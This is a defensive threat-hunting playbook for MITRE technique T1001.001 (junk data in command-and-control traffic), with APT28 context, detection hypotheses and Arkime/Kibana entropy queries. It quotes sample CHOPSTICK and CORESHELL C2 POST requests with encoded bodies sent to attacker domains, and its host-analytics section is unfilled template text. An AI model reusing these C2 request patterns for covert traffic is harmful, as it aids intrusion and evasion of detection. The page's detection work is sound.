# T1001.001 Junk Data

-----------------------------------------------------------------------

## Technique Description

Adversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. 

## Technique Detection

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)

-----------------------------------------------------------------------

### Tactics:

  *   Command-And-Control

### Platforms:

  * Linux

  * macOS

  * Windows

### Data Sources:

  * **Network Traffic:** Network Traffic Content

-----------------------------------------------------------------------

### Adversarial usage:

| Adversary Group |  Adversarial Usage |
|----|----|
| APT28 | [APT28](https://attack.mitre.org/groups/G0007) added "junk data" to each encoded string, preventing trivial decoding without knowledge of the junk removal algorithm. Each implant was given a "junk length" value when created, tracked by the controller software to allow seamless communication but prevent analysis of the command protocol on the wire.(Citation: FireEye APT28)| 
-----------------------------------------------------------------------

## Mitre References

  * [Mitre-Attack](https://attack.mitre.org/techniques/T1001/001)

  * [University Of Birmingham C2](https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf), Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.

> *Note: Do not edit this cell with information you want to keep. This cell will be wiped when the update script is ran. Store permanent information in one of the relevant cells below*

*Last pulled from Mitre on: 23 June 2022*



-----------------------------------------------------------------------

## Metadata

  * **Last Updated  Date:** 07 July 2022

  * **Author(s):** SSgt Johnathan Smith, SSgt John Beres, CTR Servando Quinones

  * **Validated:** NO

-----------------------------------------------------------------------

## Overall Hypothesis

- Adversaries will attempt to defeat trivial decoding by injecting random data to the protocols used for command and control. We suspect APT 28 will try to use pseudo-randomly generated characters that are inserted between each original character during the encoding. 

## Adversary Examples

| Adversary Specific Examples | Host Analytics | Network Analytics |
|-----------------------------|----------------|-------------------|
| APT28 |   | 1, 2 |

## Detection Blindspots

- Encrypted traffic may not allow for analysis of web payload

## Analytical References

  * [Report APT28](https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf)
  * [ESET Sednit Part 3](https://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf)

-----------------------------------------------------------------------

## Host Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Information Here

#### Analytic 1

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```

#### Analytic 2

  * **Information:** 'Comments'

  * **Source:** 'ex Windows Audits, Sysmon'

  * **Tool:** 'Arkime, Kibana, Autopsy'

  * **Notes:** 'Various notes to assist with hunting.'

  * **Query:** ```Input your query here```



-----------------------------------------------------------------------

## Network Analytics

-----------------------------------------------------------------------

### Hunter Notes

- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).
- Processes utilizing the network that do not normally have network communication or have never been seen before on the network are suspicious.
- Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.
- Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate some obfuscation activity at the network level.
- The encoding algorithm was designed to make writing signatures on network requests made by the Downdelph malware difficult. To do so, pseudo-randomly generated characters are inserted between each original character during the encoding, such that the same input text will be encoded differently each time.
- http.content-type field will vary across networks but may assist in identifying encoded content in network connection, some examples include msdos files, and base64. Exporting all http.content-type for a specified time period may give an overview of what is being seen across the network.

#### Deep Dive
- POST Request - W/BASE64 code.
  - Note: Close attention should be paid to the payload body of the POST request being made by the client:
  - ![Image](../../Images/T1001.001_Chunked-Base64.PNG)

- HTTP POST - Downdelph
  - ![Image](../../Images/T1001.001_Downdelph-HTTP-POST.PNG)

- HTTP POST - CHOPSTICK v1
    ```
    Figure 14: Sample CHOPSTICK v1 HTTP POST including module identification
    ATTENTIONS TO LINES 4 AND 14: These are Base64 encoded and then encrypted
    --------------------------------------------------------------------------
    POST /webhp?rel=psy&hl=7&ai=d2SSzFKlR4l0dRd_ZdyiwE17aTzOPeP-PVsYh1lVAXpLhIebB4=
    HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-us,en;q=0.5
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/5.0 (Windows NT 6.; WOW64; rv:20.0) Gecko/20100101
    Firefox/20.0
    Host: adobeincorp.com
    Content-Length: 71
    Cache-Control: no-cache
    d2SSzFKchH9IvjcM55eQCTbMbVAU7mR0IK6pNOrbFoF7Br0Pi__0u3Sf1Oh30_HufqHiDU=
    ```

- HTTP POST - CORESHELL
    ```
    Figure 11: Example CORESHELL POST request
    ATTENTION TO LINES 5 AND 10: POST method and the encrypted and Base64 encoded body of the POST request. A custom stream cipher using a
    six-byte key is used in this example but will vary depending on version and network.
    -------------------------------------------
    POST /check/ HTTP/1.1
    User-Agent: MSIE 8.0
    Host: adawareblock.com
    Content-Length: 58
    Cache-Control: no-cache
    zXeuYq+sq2m1a5HcqyC5Zd6yrC2WNYL989WCHse9qO6c7powrOUh5KY
    ```

#### Analytic 1

  * **Information:** Identify successful http "POST" request being sent to external host that may possibly be encoded or compressed. Use the possibility of entropy (randomness) seen in a connection to assist obfuscation within network connections. Adjust the http.uri field to eliminate ocsp, ssl providers to minimize unwanted traffic. 

  * **Source:** Network Traffic, PCAP

  * **Tool:** Arkime, Kibana

  * **Notes:** Focus on successful connections to limit amount of traffic seen across the network accompanied by entropy.http to allow for possible identification of obfuscated data being used in body payload. Encrypted traffic will make it difficult to analyze the payload and identifying http method and entropy will not be possible. Corralation with host logs would be necessary for further investigation.

  * **Query Arkime:** ```http.method == [GET,POST] && http.statuscode == 200 && entropy.http == [6, 7, 8] && ip.dst != [10/8, 172.16/12, 192.168/16]```
  * **Query Kibana:** ```http.method: (GET or POST) AND http.statuscode: 200 AND entropy.http: (6 or 7 or 8) AND NOT dstIp: (10.0.0.0/8 or 172.16.0.0/12 or 192.168.0.0/16)```

#### Analytic 2

  * **Information:** Identify possible application types that maybe used in association with POST request to external host. 

  * **Source:** Network Traffic, PCAP

  * **Tool:** Arkime, Kibana

  * **Notes:** Examine types that may be associated to successful POST request to external domains and hardcoded IPs. 

  * **Query Arkime:** ```http.method == [GET,POST] && http.statuscode ==200 && http.content-type == application/x-www-form-urlencoded <adjust type as needed>```
  * **Query Kibana:** ```http.method: (GET or POST) AND http.statuscode:200 AND http.content-type: "application/x-www-form-urlencoded" <adjust type as needed>```
